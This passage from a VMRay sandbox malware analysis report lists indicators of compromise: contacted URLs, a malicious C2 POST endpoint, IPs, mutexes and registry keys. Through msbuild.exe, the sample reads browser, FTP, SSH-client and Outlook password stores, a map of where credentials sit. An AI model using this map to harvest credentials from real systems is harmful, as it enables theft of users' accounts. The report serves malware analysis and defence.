c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Modules.cdxml
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Modules.xaml
c: \windows\system32\windowspowershell\v1.0\ Accessed File Access CLEAN Modules\Modules.dll
C:\Program Files\WindowsPowerShell\Modules\Package Accessed File Access CLEAN Management\1.0.0.1
C:\Program Files\WindowsPowerShell\Modules\Package Accessed File Access CLEAN Management\1.0.0.1\1.0.0.1.psd1
C:\Program Files\WindowsPowerShell\Modules\Package Accessed File Access CLEAN Management\1.0.0.1\1.0.0.1.psm1
C:\Program Files\WindowsPowerShell\Modules\Package Accessed File Access CLEAN Management\1.0.0.1\1.0.0.1.cdxml
C:\Program Files\WindowsPowerShell\Modules\Package Accessed File Access CLEAN Management\1.0.0.1\1.0.0.1.xaml Reduced dataset
URL
URL Category IP Address Country HTTP Methods Verdict
http://173.208.204.37/k.php/ 173.208.204.37 POST MALICIOUS SczbkxCQZQyVr
X-Ray Vision for Malware - www.vmray.com 36 / 50 DYNAMIC ANALYSIS REPORT #1559276
URL Category IP Address Country HTTP Methods Verdict
https:// 1230948%[email protected] 67.199.248.14 GET CLEAN m/awkdhikhasd
https:// ia801500.us.archive.org/0/ CLEAN items/ 1_20210527_20210527/1.txt
http:// 1230948%[email protected] CLEAN ogspot.com/p/44.html\
http:// 1230948%[email protected] 142.250.186.129 GET CLEAN ogspot.com/p/44.html
http://0v2x.blogspot.com/p/ 142.250.186.129 GET CLEAN 44.html
http://cpanel.com/? utm_source=cpanelwhm&ut m_medium=cplogo&utm_con GET CLEAN tent=logolink&utm_campaign =404referral
https://0v2x.blogspot.com/p/ 142.250.186.129 GET CLEAN 44.html
https://www.blogger.com/ static/v1/widgets/115981500- GET CLEAN css_bundle_v2.css
https://l0mx.blogspot.com/ GET CLEAN favicon.ico
https://l0mx.blogspot.com/p/ 142.250.186.129 GET CLEAN 44.html
https://www.blogger.com/ dyn-css/authorization.css? targetBlogID=433843045821 GET CLEAN 8760041&zx=7daa74e6- a63d-414d- b329-4c3a73b1266b
https://l0mx.blogspot.com GET CLEAN
https://www.blogger.com GET CLEAN
https://www.blogger.com/ blogin.g? blogspotURL=https:// GET CLEAN l0mx.blogspot.com/p/ 44.html&type=blog
https:// resources.blogblog.com/img/ GET CLEAN icon18_wrench_allbkg.png
https://www.blogger.com/ static/v1/widgets/ GET CLEAN 4154767893-widgets.js
http://fonts.googleapis.com/ GET CLEAN css?family=Open+Sans:300
http://www.google.com/css/ GET CLEAN maia.css
https://www.blogger.com/ static/v1/v-css/281434096- GET CLEAN static_pages.css
https://www.google.de/intl/de/ GET CLEAN about/products?tab=jh
https:// myaccount.google.com/? GET CLEAN utm_source=OGB&tab=jk&ut m_medium=app
https://www.google.de/ GET CLEAN webhp?tab=jw
https://maps.google.de/ GET CLEAN maps?hl=de&tab=jl
X-Ray Vision for Malware - www.vmray.com 37 / 50 DYNAMIC ANALYSIS REPORT #1559276
URL Category IP Address Country HTTP Methods Verdict
https://www.youtube.com/? GET CLEAN gl=DE&tab=j1
https://play.google.com/? GET CLEAN hl=de&tab=j8
https://news.google.com/? GET CLEAN tab=jn
https://mail.google.com/ GET CLEAN mail/?tab=jm
https://meet.google.com/? GET CLEAN hs=197
https://chat.google.com GET CLEAN
https://contacts.google.com/? GET CLEAN hl=de&tab=jC
https://drive.google.com/? GET CLEAN tab=jo
https://calendar.google.com/ GET CLEAN calendar?tab=jc
https://translate.google.de/? GET CLEAN hl=de&tab=jT
https://photos.google.com/? GET CLEAN tab=jq&pageId=none
https://duo.google.com/? GET CLEAN usp=duo_ald
https://www.google.com/ chrome/? brand=CHZO&utm_source=g oogle.com&utm_medium=de sktop-app- GET CLEAN launcher&utm_campaign=de sktop-app- launcher&utm_content=chro me- logo&utm_keyword=CHZO
https://www.google.de/ shopping? GET CLEAN hl=de&source=og&tab=jf
https://docs.google.com/ GET CLEAN document/?usp=docs_alc
https://docs.google.com/ spreadsheets/? GET CLEAN usp=sheets_alc
https://docs.google.com/ GET CLEAN presentation/?usp=slides_alc
https://books.google.de/? GET CLEAN hl=de&tab=jp
https://www.blogger.com/? GET CLEAN tab=jj
https://hangouts.google.com GET CLEAN
https://keep.google.com GET CLEAN
https:// jamboard.google.com/? GET CLEAN usp=jam_ald
https://earth.google.com/ GET CLEAN web/
https://www.google.de/save GET CLEAN
https:// artsandculture.google.com/? hl=de&utm_source=ogs.goo GET CLEAN gle.com&utm_medium=referr al
X-Ray Vision for Malware - www.vmray.com 38 / 50 DYNAMIC ANALYSIS REPORT #1559276
URL Category IP Address Country HTTP Methods Verdict
https://ads.google.com/ home/?subid=ww-ww-et-g- GET CLEAN aw-a- vasquette_ads_cons_1!o2
https://podcasts.google.com GET CLEAN
https://stadia.google.com GET CLEAN
https://www.google.com/ GET CLEAN travel/?dest_src=al
https://docs.google.com/ GET CLEAN forms/?usp=forms_alc
https://accounts.google.com/ ServiceLogin? service=blogger&continue=ht GET CLEAN tps://www.blogger.com/ blogger.g&ec=GAZAHg
http://www.blogger.com/ GET CLEAN content.g
https://l0mx.blogspot.com/p/ 44.html? interstitial=ABqL8_gvbPXHD GET CLEAN 5jpqumPTlQCtBQgp8XaSPp 4fUgU9ZuwTwjaS0cE_SN8D Fw00XdM
https://www.blogger.com/go/ GET CLEAN helpcenter
https://www.blogger.com/go/ GET CLEAN discuss
https://www.blogger.com/go/ GET CLEAN tutorials
https://www.blogger.com/go/ GET CLEAN buzz
https://www.blogger.com/go/ GET CLEAN devapi
https://www.blogger.com/go/ GET CLEAN devforum
https://www.blogger.com/go/ GET CLEAN terms
https://www.blogger.com/go/ GET CLEAN privacy
https://www.blogger.com/go/ GET CLEAN contentpolicy
https://www.google.de/ GET CLEAN contact/impressum.html
https://www.google- GET CLEAN analytics.com/analytics.js
https://www.blogger.com/ static/v1/jsbin/3101730221- GET CLEAN analytics_autotrack.js
https://0v2x.blogspot.com/ GET CLEAN favicon.ico
https://www.blogger.com/ dyn-css/authorization.css? targetBlogID=159931312530 GET CLEAN 4121436&zx=631e10cf-0d71 -470c-af57-797d37f6668c
https://0v2x.blogspot.com GET CLEAN
https://www.blogger.com/ blogin.g? blogspotURL=https:// GET CLEAN 0v2x.blogspot.com/p/ 44.html&type=blog
X-Ray Vision for Malware - www.vmray.com 39 / 50 DYNAMIC ANALYSIS REPORT #1559276
URL Category IP Address Country HTTP Methods Verdict
https://www.blogger.com/ blogin.g? blogspotURL=https%3A%2F 142.250.184.233 GET CLEAN %2Fl0mx.blogspot.com%2Fp %2F44.html&type=blog&bpli =1
Domain
Domain IP Address Country Protocols Verdict
bitly.com 67.199.248.15, 67.199.248.14 HTTPS, HTTP, DNS CLEAN
ia801500.us.archive.org 207.241.228.150 HTTPS, HTTP, DNS CLEAN
0v2x.blogspot.com 142.250.186.129 HTTPS, HTTP, DNS CLEAN
google.com HTTP CLEAN
l0mx.blogspot.com 142.250.186.129 HTTPS, DNS CLEAN
blogspot.l.googleusercontent.com 142.250.186.129 DNS CLEAN
www.blogger.com 142.250.184.233 HTTPS, HTTP CLEAN
resources.blogblog.com HTTPS CLEAN
accounts.google.com HTTPS CLEAN
fonts.googleapis.com 142.250.186.138 HTTP, DNS CLEAN
www.google.com HTTPS, HTTP CLEAN
www.google-analytics.com HTTPS CLEAN
cpanel.com HTTP CLEAN
www.google.de HTTPS CLEAN
myaccount.google.com HTTPS CLEAN
maps.google.de HTTPS CLEAN
www.youtube.com HTTPS CLEAN
play.google.com HTTPS CLEAN
news.google.com HTTPS CLEAN
mail.google.com HTTPS CLEAN
meet.google.com HTTPS CLEAN
chat.google.com HTTPS CLEAN
contacts.google.com HTTPS CLEAN
drive.google.com HTTPS CLEAN
calendar.google.com HTTPS CLEAN
translate.google.de HTTPS CLEAN
photos.google.com HTTPS CLEAN
duo.google.com HTTPS CLEAN
docs.google.com HTTPS CLEAN
books.google.de HTTPS CLEAN
hangouts.google.com HTTPS CLEAN
X-Ray Vision for Malware - www.vmray.com 40 / 50 DYNAMIC ANALYSIS REPORT #1559276
Domain IP Address Country Protocols Verdict
keep.google.com HTTPS CLEAN
jamboard.google.com HTTPS CLEAN
earth.google.com HTTPS CLEAN
artsandculture.google.com HTTPS CLEAN
ads.google.com HTTPS CLEAN
podcasts.google.com HTTPS CLEAN
stadia.google.com HTTPS CLEAN
173.208.204.37 173.208.204.37 HTTP, DNS CLEAN
IP
IP Address Domains Country Protocols Verdict
207.241.228.150 ia801500.us.archive.org United States HTTPS, TCP, DNS MALICIOUS
173.208.204.37 United States HTTP, TCP, DNS MALICIOUS
www-google- 172.217.18.110 analytics.l.google.com, United States HTTPS, TCP, DNS CLEAN www.google-analytics.com
172.217.18.100 www.google.com United States HTTPS, TCP, DNS CLEAN
blogger.l.google.com, 142.250.184.233 resources.blogblog.com, United States HTTPS, TCP, DNS CLEAN www.blogger.com
142.250.185.205 accounts.google.com United States HTTPS, TCP, DNS CLEAN
blogspot.l.googleusercontent.com, 142.250.186.129 0v2x.blogspot.com, United States HTTPS, HTTP, TCP, DNS CLEAN l0mx.blogspot.com
67.199.248.14 bitly.com United States HTTPS, TCP, DNS CLEAN
142.250.186.138 fonts.googleapis.com United States HTTPS, TCP, DNS CLEAN
67.199.248.15 bitly.com United States DNS CLEAN
-
Email Address
-
Mutex
Name Operations Parent Process Name Verdict
Local\MSIMGSIZECacheMutex access mshta.exe CLEAN
Global\PowerShell_CommandAnalysis_Lock _S-1-5-21-1560258661-3990802383-181173 access powershell.exe CLEAN 0007-1000
B7274519EDDE9BDC8AE51348 access msbuild.exe CLEAN
Registry
Registry Key Operations Parent Process Name Verdict
HKEY_CLASSES_ROOT\clsid\{25336920-03 read, access mshta.exe CLEAN f9-11cf-8fd0-00aa00686f13}\InProcServer32
X-Ray Vision for Malware - www.vmray.com 41 / 50 DYNAMIC ANALYSIS REPORT #1559276
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft access mshta.exe CLEAN \Internet Explorer\ChakraRecycler
HKEY_CURRENT_USER\Software\Microsoft access mshta.exe CLEAN \Internet Explorer\ChakraRecycler
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows\CurrentVersion\App read, access mshta.exe CLEAN Paths\OUTLOOK.EXE\Path
HKEY_LOCAL_MACHINE\Software\Microsoft \Internet Explorer\Application read, access mshta.exe CLEAN Compatibility\mshta.exe
HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\Explorer\N read, access mshta.exe CLEAN oFileMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows\CurrentVersion\Parental access mshta.exe CLEAN Controls\Users\S-1-5-21-1560258661-39908 02383-1811730007-1000
HKEY_LOCAL_MACHINE\Software\Microsoft access mshta.exe CLEAN \Internet Explorer\JScriptLegacy
HKEY_CURRENT_USER\Software\Microsoft access mshta.exe CLEAN \Internet Explorer\JScriptLegacy
HKEY_CURRENT_USER\EUDC\1252 access mshta.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft access mshta.exe CLEAN \Wbem\Scripting
HKEY_LOCAL_MACHINE\Software\Microsoft read, access mshta.exe CLEAN \Wbem\Scripting\Default Impersonation Level
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access mshta.exe CLEAN osoft\Windows Script\Features
HKEY_LOCAL_MACHINE\Software\Policies\ Microsoft\Windows\PowerShell\ScriptBlockLo access powershell.exe CLEAN gging
HKEY_CURRENT_USER\Software\Policies\ Microsoft\Windows\PowerShell\ScriptBlockLo access powershell.exe CLEAN gging
HKEY_LOCAL_MACHINE\Software\Microsoft access powershell.exe CLEAN \PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE\Software\Microsoft \PowerShell\3\PowerShellEngine\Application read, access powershell.exe CLEAN Base
HKEY_CURRENT_USER\SOFTWARE\Micro access powershell.exe CLEAN soft\.NETFramework\XML
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access powershell.exe CLEAN osoft\.NETFramework\XML
HKEY_LOCAL_MACHINE\System\CurrentCo ntrolSet\Control\Session access powershell.exe CLEAN Manager\Environment
HKEY_LOCAL_MACHINE\System\CurrentCo ntrolSet\Control\Session read, access powershell.exe CLEAN Manager\Environment\__PSLockdownPolicy
HKEY_LOCAL_MACHINE\Software\Microsoft access powershell.exe CLEAN \Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft read, access powershell.exe CLEAN \Windows NT\CurrentVersion\InstallationType
HKEY_CURRENT_USER access powershell.exe CLEAN
HKEY_CURRENT_USER\SOFTWARE\Micro soft\Windows\CurrentVersion\Internet access powershell.exe CLEAN Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows\CurrentVersion\Internet access powershell.exe CLEAN Settings\Connections
X-Ray Vision for Malware - www.vmray.com 42 / 50 DYNAMIC ANALYSIS REPORT #1559276
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\SOFTWARE\Polici es\Microsoft\Windows\CurrentVersion\Interne access powershell.exe CLEAN t Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access powershell.exe CLEAN osoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Micr read, access powershell.exe CLEAN osoft\.NETFramework\LegacyWPADSupport
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access powershell.exe CLEAN osoft\.NETFramework\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\.NETFramework\v4.0.30319\HWRPortR read, access powershell.exe CLEAN euseOnSocketBind
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\.NETFramework\v4.0.30319\SchUseStr read, access powershell.exe CLEAN ongCrypto
HKEY_LOCAL_MACHINE\Software\Microsoft \Internet Explorer\Application read, access mshta.exe CLEAN Compatibility\MsHtA.exe
HKEY_LOCAL_MACHINE\Software\Policies\ Microsoft\Windows\EventLog\ProtectedEvent access powershell.exe CLEAN Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Micr access msbuild.exe CLEAN osoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Micr read, access msbuild.exe CLEAN osoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozil read, access msbuild.exe CLEAN la\Mozilla Firefox\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Com read, access msbuild.exe CLEAN odoGroup\IceDragon\Setup\SetupPath
HKEY_LOCAL_MACHINE\SOFTWARE\Appl read, access msbuild.exe CLEAN e Computer, Inc.\Safari\InstallDir
HKEY_LOCAL_MACHINE\SOFTWARE\K- read, access msbuild.exe CLEAN Meleon\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\mozil read, access msbuild.exe CLEAN la.org\SeaMonkey\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Mozil read, access msbuild.exe CLEAN la\SeaMonkey\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Mozil read, access msbuild.exe CLEAN la\Flock\CurrentVersion
HKEY_CURRENT_USER\Software\QtWeb.N access msbuild.exe CLEAN ET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft access msbuild.exe CLEAN \Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pec read, access msbuild.exe CLEAN xstudios\Cyberfox86\RootDir
HKEY_LOCAL_MACHINE\SOFTWARE\8pec read, access msbuild.exe CLEAN xstudios\Cyberfox\Path
HKEY_LOCAL_MACHINE\SOFTWARE\Mozil read, access msbuild.exe CLEAN la\Pale Moon\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Mozil read, access msbuild.exe CLEAN la\Waterfox\CurrentVersion
HKEY_CURRENT_USER\Software\LinasFTP access msbuild.exe CLEAN \Site Manager
HKEY_CURRENT_USER\Software\FlashPea read, access msbuild.exe CLEAN k\BlazeFtp\Settings\LastPassword
HKEY_CURRENT_USER\Software\Ghisler\T read, access msbuild.exe CLEAN otal Commander\FtpIniName
HKEY_CURRENT_USER\Software access msbuild.exe CLEAN
X-Ray Vision for Malware - www.vmray.com 43 / 50 DYNAMIC ANALYSIS REPORT #1559276
Registry Key Operations Parent Process Name Verdict
HKEY_CURRENT_USER\Software\AppData access msbuild.exe CLEAN Low
HKEY_CURRENT_USER\Software\IM access msbuild.exe CLEAN Providers
HKEY_CURRENT_USER\Software\Microsoft access msbuild.exe CLEAN
HKEY_CURRENT_USER\Software\Netscape access msbuild.exe CLEAN
HKEY_CURRENT_USER\Software\ODBC access msbuild.exe CLEAN
HKEY_CURRENT_USER\Software\Policies access msbuild.exe CLEAN
HKEY_CURRENT_USER\Software\Registere access msbuild.exe CLEAN dApplications
HKEY_CURRENT_USER\Software\Wow643 access msbuild.exe CLEAN 2Node
HKEY_CURRENT_USER\Software\Classes access msbuild.exe CLEAN
HKEY_CURRENT_USER\Software\Far\Plugi access msbuild.exe CLEAN ns\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plu access msbuild.exe CLEAN gins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\B read, access msbuild.exe CLEAN vSshClient\LastUsedProfile
HKEY_CURRENT_USER\Software\VanDyke\ read, access msbuild.exe CLEAN SecureFX\Config Path
HKEY_LOCAL_MACHINE\Software\NCH access msbuild.exe CLEAN Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH access msbuild.exe CLEAN Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH access msbuild.exe CLEAN Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH access msbuild.exe CLEAN Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\ access msbuild.exe CLEAN KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTat access msbuild.exe CLEAN ham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTa access msbuild.exe CLEAN tham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com access msbuild.exe CLEAN \KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozil read, access msbuild.exe CLEAN la\Mozilla Thunderbird\CurrentVersion
HKEY_CURRENT_USER\Software\IncrediM access msbuild.exe CLEAN ail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediM access msbuild.exe CLEAN ail\Identities
HKEY_CURRENT_USER\Software\Martin access msbuild.exe CLEAN Prikryl
HKEY_LOCAL_MACHINE\Software\Martin access msbuild.exe CLEAN Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Post read, access msbuild.exe CLEAN box\Postbox\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Mozil read, access msbuild.exe CLEAN la\FossaMail\CurrentVersion
HKEY_CURRENT_USER\Software\WinChips access msbuild.exe CLEAN \UserAccounts
X-Ray Vision for Malware - www.vmray.com 44 / 50 DYNAMIC ANALYSIS REPORT #1559276
Registry Key Operations Parent Process Name Verdict
HKEY_CURRENT_USER\Software\Microsoft \Windows NT\CurrentVersion\Windows access msbuild.exe CLEAN Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft access msbuild.exe CLEAN \Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft access msbuild.exe CLEAN \Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\0a0d02 access msbuild.exe CLEAN 0000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\0a0d02 read, access msbuild.exe CLEAN 0000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\13dbb0c access msbuild.exe CLEAN 8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\13dbb0c read, access msbuild.exe CLEAN 8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\2db91c5 access msbuild.exe CLEAN fd8470d46b1a5bc5efab4cae7
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\2db91c5 read, access msbuild.exe CLEAN fd8470d46b1a5bc5efab4cae7\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\351749 access msbuild.exe CLEAN 0d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\351749 read, access msbuild.exe CLEAN 0d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\6c29d51 access msbuild.exe CLEAN f56390b45a924b3b787013a66
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\6c29d51 read, access msbuild.exe CLEAN f56390b45a924b3b787013a66\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\850302 access msbuild.exe CLEAN 0000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\850302 read, access msbuild.exe CLEAN 0000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\876320 access msbuild.exe CLEAN 3907727d498bce4b981b157d7b
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\876320 read, access msbuild.exe CLEAN 3907727d498bce4b981b157d7b\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\893893 access msbuild.exe CLEAN ade607c44aa338ac7df5d6cb42
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\893893 read, access msbuild.exe CLEAN ade607c44aa338ac7df5d6cb42\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9207f3e access msbuild.exe CLEAN 0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9207f3e read, access msbuild.exe CLEAN 0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF access msbuild.exe CLEAN F0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\Email
X-Ray Vision for Malware - www.vmray.com 45 / 50 DYNAMIC ANALYSIS REPORT #1559276
Registry Key Operations Parent Process Name Verdict
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000001\ Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ Email
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ SMTP Server
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ SMTP User
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ POP3 Server
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ POP3 User
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ NNTP Server
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\I MAP Server
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\I MAP User Name
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\I MAP User
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ HTTP User
X-Ray Vision for Malware - www.vmray.com 46 / 50 DYNAMIC ANALYSIS REPORT #1559276
Registry Key Operations Parent Process Name Verdict
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ POP3 Port
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ SMTP Port
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\I MAP Port
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\I MAP Password2
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ POP3 Password
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\I MAP Password
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ NNTP Password
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ HTTP Password
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000002\ SMTP Password
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft \Office\16.0\Outlook\Profiles\Outlook\9375CF read, access msbuild.exe CLEAN F0413111d3B88A00104B2A6676\00000003\ Email
X-Ray Vision for Malware - www.vmray.com 47 / 50 DYNAMIC ANALYSIS REPORT #1559276
Registry Key Operations Parent Process Name Verdict
